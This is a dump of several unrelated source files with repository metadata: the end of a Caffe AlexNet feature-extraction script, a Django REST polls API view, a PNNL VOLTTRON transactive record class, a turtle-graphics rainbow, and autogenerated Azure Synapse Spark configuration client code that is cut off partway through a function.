#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", #"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", #"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", ] deploylist=[alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", #alexnetpath+"bvlc_alexnet/deploy.prototxt", #alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", #alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", alexnetpath+"bvlc_alexnet/deploy.prototxt", ] # meanlist=[alexnetpath+"patchcifa10_256_mean.binaryproto", meanlist=[alexnetpath+"mnist/mnist_data/mean/mean1.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean2.binaryproto", #alexnetpath+"mnist/mnist_data/mean/mean3.binaryproto", #alexnetpath+"mnist/mnist_data/mean/mean4.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean5.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean6.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean7.binaryproto", #alexnetpath+"mnist/mnist_data/mean/mean8.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean9.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean10.binaryproto", alexnetpath+"mnist/mnist_data/mean/mean11.binaryproto", ] shapelists=[[10,3,227,227],[10,3,227,227],\ [10,3,227,227],[10,3,227,227],\ [10,3,227,227],[10,3,227,227],\ [10,3,227,227],[10,3,227,227]]# # [32,3,224,224],[32,3,224,224],\ # [64,3,32,32],[64,3,32,32],[64,3,32,32],[64,3,32,32], # [10,3,227,227],[10,3,227,227],[10,3,224,224],[10,3,224,224]] labellist=["cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv", "cifa10_valdst.csv",] #"cifa10_valdst.csv",] # "svhn_ori_valdst.csv",] # labellist=[""] # outlist=["cifar10_alex_oversmaple.mat","cifar10_alex_ori.mat","cifar10_cifar10_dvn.mat", # "cifar10_cifar10_ori.mat","cifar10_google_dvn.mat","cifar10_google_ori.mat", # "svhn_cifar10_dvn.mat","svhn_cifar10_ori.mat","svhn_alex_dvn.mat","svhn_alex_ori.mat", # "svhn_google_dvn.mat","svhn_google_ori.mat" # ] outlist=["alex_mfseoverh1.mat","alex_mfseoverh2.mat", "alex_mfseoverh5.mat","alex_mfseoverh6.mat", "alex_mfseoverh7.mat","alex_mfseoverh9.mat", "alex_mfseoverh10.mat","alex_mfseoverh11.mat",] #] layernamelist=["fc8","fc8","fc8","fc8","fc8","fc8","fc8","fc8"] # "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"] # layernamelist=["fc8","fc8","loss3/classifier","loss3/classifier","ip1","ip1", # "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"] import traceback # for i in range(len(modelist)-1,len(modelist)): for i in range(0,len(modelist)): # for i in range(0,1): # if i<4 and i>1: # continue # for i in range(2,4): try: print modelist[i] net,transformer=loadmodel(modelpath=modelist[i],deployroot=deploylist[i], meanroot=meanlist[i],shapelist=shapelists[i]) image2mat(net,transformer,datalist[i],outlist[i],labellist[i],layernamelist[i]) except Exception as e: print e print traceback.format_exc() # break continue #argv[0] inputimagedir argv[1] labelfile if __name__=='__main__': # if len(sys.argv)!=3: # print "Usage:python{}inputimagedir outdir labelfile".format(sys.argv[0]) batch_extrac_featuretomat() #net,transformer=loadmodel(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/cifa10/cifar10_deploy.prototxt",meanroot="data/cifar10-gcn-leveldb-splits/paddedmean.npy",shapelist=[100,3,32,32]) # # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/scene/deploy.prototxt",shapelist=[50,3,100,100]) # image2mat(net,transformer,sys.argv[1],sys.argv[2],sys.argv[3])#argv[0] inputimagedir argv[1] labelfile #def loadmodel(cafferoot,modelpath,deployroot,meanroot,shapelist=[64,3,100,100]):
405974db9681a1efc9bb65d55fa0ae64ee33d230
94470cf07f402b1c7824e92a852cd3203f94ac4a
/polls/apiviews.py
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
[]
no_license
jbeltranleon/pollsapi_django_rest
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
0855820541064ffd77dbd1c6e77f695d4f18e517
refs/heads/master
2020-04-14T17:55:02.364183
2019-01-04T16:01:46
2019-01-04T16:01:46
163,999,126
0
0
null
null
null
null
UTF-8
Python
false
false
1,203
py
from rest_framework import generics from rest_framework.views import APIView from rest_framework import status from rest_framework.response import Response from .models import Poll, Choice from .serializers import PollSerializer, ChoiceSerializer,\ VoteSerializer class PollList(generics.ListCreateAPIView): queryset = Poll.objects.all() serializer_class = PollSerializer class PollDetail(generics.RetrieveDestroyAPIView): queryset = Poll.objects.all() serializer_class = PollSerializer class ChoiceList(generics.ListCreateAPIView): def get_queryset(self): queryset = Choice.objects.filter(poll_id=self.kwargs["pk"]) return queryset serializer_class = ChoiceSerializer class CreateVote(APIView): def post(self, request, pk, choice_pk): voted_by = request.data.get("voted_by") data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by} serializer = VoteSerializer(data=data) if serializer.is_valid(): vote = serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) else: return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
e27d03897ae226bf6eafffa5093cee07b628880d
a1dd6f2e13506b54120532c2ed093dc270eff4ac
/GridServices/TransactiveControl/TNT_Version1/TNSAgent/tns/transactive_record.py
3f466148e9947fe21eff8fd0e8fe6acc846f3d6b
[ "BSD-3-Clause" ]
permissive
shwethanidd/volttron-pnnl-applications-2
ec8cc01c1ffeff884c091617892fea6e84a3e46e
24d50729aef8d91036cc13b0f5c03be76f3237ed
refs/heads/main
2023-06-18T12:13:13.607951
2021-06-30T23:00:01
2021-06-30T23:00:01
359,586,385
0
0
BSD-3-Clause
2021-04-19T20:15:45
2021-04-19T20:15:45
null
UTF-8
Python
false
false
4,505
py
""" Copyright (c) 2020, Battelle Memorial Institute All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of the FreeBSD Project. This material was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the United States Department of Energy, nor Battelle, nor any of their employees, nor any jurisdiction or organization that has cooperated in th.e development of these materials, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness or any information, apparatus, product, software, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise does not necessarily constitute or imply its endorsement, recommendation, or favoring by the United States Government or any agency thereof, or Battelle Memorial Institute. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof. PACIFIC NORTHWEST NATIONAL LABORATORY operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY under Contract DE-AC05-76RL01830 """ from datetime import datetime from .time_interval import TimeInterval from .helpers import format_ts class TransactiveRecord: def __init__(self, ti, rn, mp, p, pu=0.0, cost=0.0, rp=0.0, rpu=0.0, v=0.0, vu=0.0): # NOTE: As of Feb 2018, ti is forced to be text, the time interval name, # not a TimeInterval object. # ti - TimeInterval object (that must be converted to its name) # rn - record number, a nonzero integer # mp - marginal price [$/kWh] # p - power [avg.kW] # These are the four normal arguments of the constructor. # NOTE: Use the time interval ti text name, not a TimeInterval object itself. if isinstance(ti, TimeInterval): # A TimeInterval object argument must be represented by its text name. self.timeInterval = ti.name else: # Argument ti is most likely received as a text string name. Further # validation might be used to make sure that ti is a valid name of an # active time interval. self.timeInterval = ti self.record = rn # a record number (0 refers to the balance point) self.marginalPrice = mp # marginal price [$/kWh] self.power = p # power [avg.kW] # Source and target are obvious from Neighbor and filenames. Omit # self.powerUncertainty = pu # relative [dimensionless] self.cost = cost # ? # self.reactivePower = rp # [avg.kVAR] # self.reactivePowerUncertainty = rpu # relative [dimensionless] # self.voltage = v # [p.u.] # self.voltageUncertainty = vu # relative [dimensionless] # Finally, create the timestamp that captures when the record is created. self.timeStamp = datetime.utcnow()
8dffd82bcaecce6cabc8c75ad494f05fdb50eb2c
463b1807820b9fa119e0c17afaa06840fef0e2a3
/TURTLE/Rainbow.py
c1cd2fce89f6b3134ecc681a44f9b1183f16a2cc
[]
no_license
ferdi-oktavian/Python
ad8aac711d5565739077a6e5358777807dd464d3
27ad83aeedb3e460927bfcf179bc4e4b1ed28366
refs/heads/main
2023-03-09T02:49:54.481087
2021-03-02T00:12:54
2021-03-02T00:12:54
343,593,542
1
0
null
null
null
null
UTF-8
Python
false
false
681
py
import turtle import colorsys def draw_one_color_arc(x, y, r, pensize, color): turtle.up();turtle.goto(x+r,y) turtle.down();turtle.seth(90) turtle.pensize(pensize);turtle.pencolor(color) turtle.circle(r,180) turtle.speed(0) turtle.hideturtle() turtle.bgcolor('light blue') turtle.title('rainboww') turtle.setup(700, 700) num_colors = 49 radius = 400 penwidth = 20 * 7 / num_colors hue = 0 for i in range(num_colors): (r, g, b) = colorsys.hsv_to_rgb(hue,1,1) draw_one_color_arc(0, -100,radius,penwidth,(r,g,b)) radius -= (penwidth-1) hue += 0.9/num_colors turtle.getscreen()._root.mainloop()
90352a180e75d18219b8cba394d4d2b8f03de187
aa0270b351402e421631ebc8b51e528448302fab
/sdk/synapse/azure-synapse-artifacts/azure/synapse/artifacts/operations/_spark_configuration_operations.py
9d5b1194a4b1cae79ac490bbe3402239b826e729
[ "MIT", "LGPL-2.1-or-later", "LicenseRef-scancode-generic-cla" ]
permissive
fangchen0601/azure-sdk-for-python
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
c2e11d6682e368b2f062e714490d2de42e1fed36
refs/heads/master
2023-05-11T16:53:26.317418
2023-05-04T20:02:16
2023-05-04T20:02:16
300,440,803
0
0
MIT
2020-10-16T18:45:29
2020-10-01T22:27:56
null
UTF-8
Python
false
false
33,298
py
# pylint: disable=too-many-lines # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import sys from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast from azure.core.exceptions import ( ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, ResourceNotModifiedError, map_error, ) from azure.core.paging import ItemPaged from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import HttpResponse from azure.core.polling import LROPoller, NoPolling, PollingMethod from azure.core.polling.base_polling import LROBasePolling from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.utils import case_insensitive_dict from .. import models as _models from .._serialization import Serializer from .._vendor import _convert_request, _format_url_section if sys.version_info >= (3, 8): from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports else: from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports T = TypeVar("T") ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] _SERIALIZER = Serializer() _SERIALIZER.client_side_validation = False def build_get_spark_configurations_by_workspace_request(**kwargs: Any) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop("template_url", "/sparkconfigurations") # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) def build_create_or_update_spark_configuration_request( spark_configuration_name: str, *, if_match: Optional[str] = None, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None)) accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}") path_format_arguments = { "sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"), } _url: str = _format_url_section(_url, **path_format_arguments) # type: ignore # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if if_match is not None: _headers["If-Match"] = _SERIALIZER.header("if_match", if_match, "str") if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="PUT", url=_url, params=_params, headers=_headers, **kwargs) def build_get_spark_configuration_request( spark_configuration_name: str, *, if_none_match: Optional[str] = None, **kwargs: Any ) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}") path_format_arguments = { "sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"), } _url: str = _format_url_section(_url, **path_format_arguments) # type: ignore # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if if_none_match is not None: _headers["If-None-Match"] = _SERIALIZER.header("if_none_match", if_none_match, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs) def build_delete_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}") path_format_arguments = { "sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"), } _url: str = _format_url_section(_url, **path_format_arguments) # type: ignore # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs) def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest: _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None)) accept = _headers.pop("Accept", "application/json") # Construct URL _url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename") path_format_arguments = { "sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"), } _url: str = _format_url_section(_url, **path_format_arguments) # type: ignore # Construct parameters _params["api-version"] = _SERIALIZER.query("api_version", api_version, "str") # Construct headers if content_type is not None: _headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str") _headers["Accept"] = _SERIALIZER.header("accept", accept, "str") return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs) class SparkConfigurationOperations: """ .. warning:: **DO NOT** instantiate this class directly. Instead, you should access the following operations through :class:`~azure.synapse.artifacts.ArtifactsClient`'s :attr:`spark_configuration` attribute. """ models = _models def __init__(self, *args, **kwargs): input_args = list(args) self._client = input_args.pop(0) if input_args else kwargs.pop("client") self._config = input_args.pop(0) if input_args else kwargs.pop("config") self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer") self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer") @distributed_trace def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]: """Lists sparkconfigurations. :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either SparkConfigurationResource or the result of cls(response) :rtype: ~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None) error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) def prepare_request(next_link=None): if not next_link: request = build_get_spark_configurations_by_workspace_request( api_version=api_version, template_url=self.get_spark_configurations_by_workspace.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url( "self._config.endpoint", self._config.endpoint, "str", skip_quote=True ), } request.url = self._client.format_url(request.url, **path_format_arguments) else: request = HttpRequest("GET", next_link) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url( "self._config.endpoint", self._config.endpoint, "str", skip_quote=True ), } request.url = self._client.format_url(request.url, **path_format_arguments) request.method = "GET" return request def extract_data(pipeline_response): deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) # type: ignore return deserialized.next_link or None, iter(list_of_elem) def get_next(next_link=None): request = prepare_request(next_link) pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) return pipeline_response return ItemPaged(get_next, extract_data) get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"} def _create_or_update_spark_configuration_initial( self, spark_configuration_name: str, properties: _models.SparkConfiguration, if_match: Optional[str] = None, **kwargs: Any ) -> Optional[_models.SparkConfigurationResource]: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None) _spark_configuration = _models.SparkConfigurationResource(properties=properties) _json = self._serialize.body(_spark_configuration, "SparkConfigurationResource") request = build_create_or_update_spark_configuration_request( spark_configuration_name=spark_configuration_name, if_match=if_match, api_version=api_version, content_type=content_type, json=_json, template_url=self._create_or_update_spark_configuration_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } request.url = self._client.format_url(request.url, **path_format_arguments) pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 202]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = None if response.status_code == 200: deserialized = self._deserialize("SparkConfigurationResource", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized _create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"} @distributed_trace def begin_create_or_update_spark_configuration( self, spark_configuration_name: str, properties: _models.SparkConfiguration, if_match: Optional[str] = None, **kwargs: Any ) -> LROPoller[_models.SparkConfigurationResource]: """Creates or updates a sparkconfiguration. :param spark_configuration_name: The spark Configuration name. Required. :type spark_configuration_name: str :param properties: Properties of Spark Configuration. Required. :type properties: ~azure.synapse.artifacts.models.SparkConfiguration :param if_match: ETag of the sparkConfiguration entity. Should only be specified for update, for which it should match existing entity or can be * for unconditional update. Default value is None. :type if_match: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be LROBasePolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either SparkConfigurationResource or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = case_insensitive_dict(kwargs.pop("headers", {}) or {}) _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None) polling: Union[bool, PollingMethod] = kwargs.pop("polling", True) lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token: Optional[str] = kwargs.pop("continuation_token", None) if cont_token is None: raw_result = self._create_or_update_spark_configuration_initial( spark_configuration_name=spark_configuration_name, properties=properties, if_match=if_match, api_version=api_version, content_type=content_type, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): deserialized = self._deserialize("SparkConfigurationResource", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } if polling is True: polling_method: PollingMethod = cast( PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs) ) elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, continuation_token=cont_token, client=self._client, deserialization_callback=get_long_running_output, ) return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"} @distributed_trace def get_spark_configuration( self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any ) -> Optional[_models.SparkConfigurationResource]: """Gets a sparkConfiguration. :param spark_configuration_name: The spark Configuration name. Required. :type spark_configuration_name: str :param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get. If the ETag matches the existing entity tag, or if * was provided, then no content will be returned. Default value is None. :type if_none_match: str :keyword callable cls: A custom type or function that will be passed the direct response :return: SparkConfigurationResource or None or the result of cls(response) :rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None :raises ~azure.core.exceptions.HttpResponseError: """ error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None) request = build_get_spark_configuration_request( spark_configuration_name=spark_configuration_name, if_none_match=if_none_match, api_version=api_version, template_url=self.get_spark_configuration.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } request.url = self._client.format_url(request.url, **path_format_arguments) pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 304]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) deserialized = None if response.status_code == 200: deserialized = self._deserialize("SparkConfigurationResource", pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"} def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements self, spark_configuration_name: str, **kwargs: Any ) -> None: error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError, 304: ResourceNotModifiedError, } error_map.update(kwargs.pop("error_map", {}) or {}) _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) cls: ClsType[None] = kwargs.pop("cls", None) request = build_delete_spark_configuration_request( spark_configuration_name=spark_configuration_name, api_version=api_version, template_url=self._delete_spark_configuration_initial.metadata["url"], headers=_headers, params=_params, ) request = _convert_request(request) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } request.url = self._client.format_url(request.url, **path_format_arguments) pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access request, stream=False, **kwargs ) response = pipeline_response.http_response if response.status_code not in [200, 202, 204]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response) if cls: return cls(pipeline_response, None, {}) _delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"} @distributed_trace def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]: """Deletes a sparkConfiguration. :param spark_configuration_name: The spark Configuration name. Required. :type spark_configuration_name: str :keyword callable cls: A custom type or function that will be passed the direct response :keyword str continuation_token: A continuation token to restart a poller from a saved state. :keyword polling: By default, your polling method will be LROBasePolling. Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy. :paramtype polling: bool or ~azure.core.polling.PollingMethod :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present. :return: An instance of LROPoller that returns either None or the result of cls(response) :rtype: ~azure.core.polling.LROPoller[None] :raises ~azure.core.exceptions.HttpResponseError: """ _headers = kwargs.pop("headers", {}) or {} _params = case_insensitive_dict(kwargs.pop("params", {}) or {}) api_version: Literal["2021-06-01-preview"] = kwargs.pop( "api_version", _params.pop("api-version", "2021-06-01-preview") ) cls: ClsType[None] = kwargs.pop("cls", None) polling: Union[bool, PollingMethod] = kwargs.pop("polling", True) lro_delay = kwargs.pop("polling_interval", self._config.polling_interval) cont_token: Optional[str] = kwargs.pop("continuation_token", None) if cont_token is None: raw_result = self._delete_spark_configuration_initial( # type: ignore spark_configuration_name=spark_configuration_name, api_version=api_version, cls=lambda x, y, z: x, headers=_headers, params=_params, **kwargs ) kwargs.pop("error_map", None) def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements if cls: return cls(pipeline_response, None, {}) path_format_arguments = { "endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True), } if polling is True: polling_method: PollingMethod = cast( PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs) ) elif polling is False: polling_method = cast(PollingMethod, NoPolling()) else: polling_method = polling if cont_token: return LROPoller.from_continuation_token( polling_method=polling_method, 